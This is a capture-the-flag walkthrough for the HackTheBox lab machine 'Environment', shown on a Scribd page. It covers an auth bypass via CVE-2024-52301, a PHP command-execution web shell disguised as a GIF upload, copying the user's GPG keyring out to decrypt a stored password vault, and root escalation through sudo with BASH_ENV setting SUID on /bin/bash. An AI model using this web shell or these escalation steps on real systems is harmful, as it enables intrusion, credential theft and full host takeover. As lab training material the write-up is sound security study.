KEMBAR78
Environment | PDF | Computer Networking | Computer Science
Scribd
Upload
6K views3 pages

Environment

The document outlines a penetration testing scenario involving the environment.htb server, detailing the services running, including SSH and HTTP. It describes exploiting a vulnerability to gain access to the user 'hish', retrieving sensitive information, and ultimately escalating privileges to root. The process includes uploading a web shell, executing commands, and manipulating file permissions to achieve root access.

Uploaded by

21r21a6238
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
6K views3 pages

Environment

The document outlines a penetration testing scenario involving the environment.htb server, detailing the services running, including SSH and HTTP. It describes exploiting a vulnerability to gain access to the user 'hish', retrieving sensitive information, and ultimately escalating privileges to root. The process includes uploading a web shell, executing commands, and manipulating file permissions to achieve root access.

Uploaded by

21r21a6238
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

Environment

Nmap scan report for environment.htb (10.10.11.67)


Host is up (0.25s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey:
| 256 5c:02:33:95:ef:44:e2:80:cd:3a:96:02:23:f1:92:64 (ECDSA)
|_ 256 1f:3d:c2:19:55:28:a1:77:59:51:48:10:c4:4b:74:ab (ED25519)
80/tcp open http nginx 1.22.1
|_http-title: Save the Environment | environment.htb
|_http-server-header: nginx/1.22.1
8000/tcp open http-alt?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

echo "10.10.11.67 environment.htb" | sudo tee -a /etc/hosts

gobuster dir -u http://environment.htb/ -w /usr/share/wordlists/dirb/common.txt


/build (Status: 301) [Size: 169] [--> http://environment.htb/build/]
/favicon.ico (Status: 200) [Size: 0]
/index.php (Status: 200) [Size: 4602]
/logout (Status: 302) [Size: 358] [--> http://environment.htb/login]
/login (Status: 200) [Size: 2391]
/robots.txt (Status: 200) [Size: 24]
/storage (Status: 301) [Size: 169] [--> http://environment.htb/storage/]
/up (Status: 200) [Size: 2126]
/vendor (Status: 301) [Size: 169] [--> http://environment.htb/vendor/]

Go to login page
triggering remember parameter to error (&remember=') disclosures env name: preprod

https://github.com/Nyamort/CVE-2024-52301
so with this PoC, go to login page, write some random data, intercept the request and add ?--env=preprod and forward it.
So it will redirect you straight dashboard of Hish user.

save this webshell as shell.gif.php.


IMPORTANT: adding dot after php and adding allowed file's header at the top .
Go to profile section, upload it:

GIF87a
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="cmd" id="cmd" size="80">
<input type="submit" value="Execute">
</form>
<pre>
<?php
if (isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>
</pre>
</body>
<script>
document.getElementById("cmd").focus();
</script>
</html>

U will get shell of www-data:

cat /home/hish/user.txt

bash-5.2$ ls /home/hish
backup user.txt
bash-5.2$ ls /home/hish/backup/
keyvault.gpg

cd /home/backup
python3 -m http.server 8080
wget 10.10.11.67:8080/keyvault.gpg

cd ../
tar -czf /tmp/gnupg.tar.gz ./.gnupg
cd /tmp
python3 -m http.server 8080

wget 10.10.11.67:8080/gnupg.tar.gz
tar -xzf gnupg.tar.gz
mv ~/.gnupg ~/Documents # save our .gnupg
mv .gnupg ~/ # replace hish gnupg to our home dir
gpg --decrypt keyvault.gpg
gpg: WARNING: unsafe permissions on homedir
gpg: encrypted with rsa2048 key, ID B755B0EDD6CFCFD3, created 2025-01-11`
"hish_ <hish@environment.htb>"
PAYPAL.COM -> Ihaves0meMon$yhere123
ENVIRONMENT.HTB -> marineSPm@ster!!
FACEBOOK.COM -> summerSunnyB3ACH!!

ssh hish@10.10.11.67
marineSPm@ster!!

For Root

-bash-5.2$ sudo -l
Matching Defaults entries for hish on environment:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+="ENV
BASH_ENV", use_pty
User hish may run the following commands on environment:
(ALL) /usr/bin/systeminfo

echo -e '#!/bin/bash\nchmod +s /bin/bash' > root.sh


chmod 777 root.sh
sudo BASH_ENV=root.sh /usr/bin/systeminfo

/bin/bash -p
cat /root/root.txt

You might also like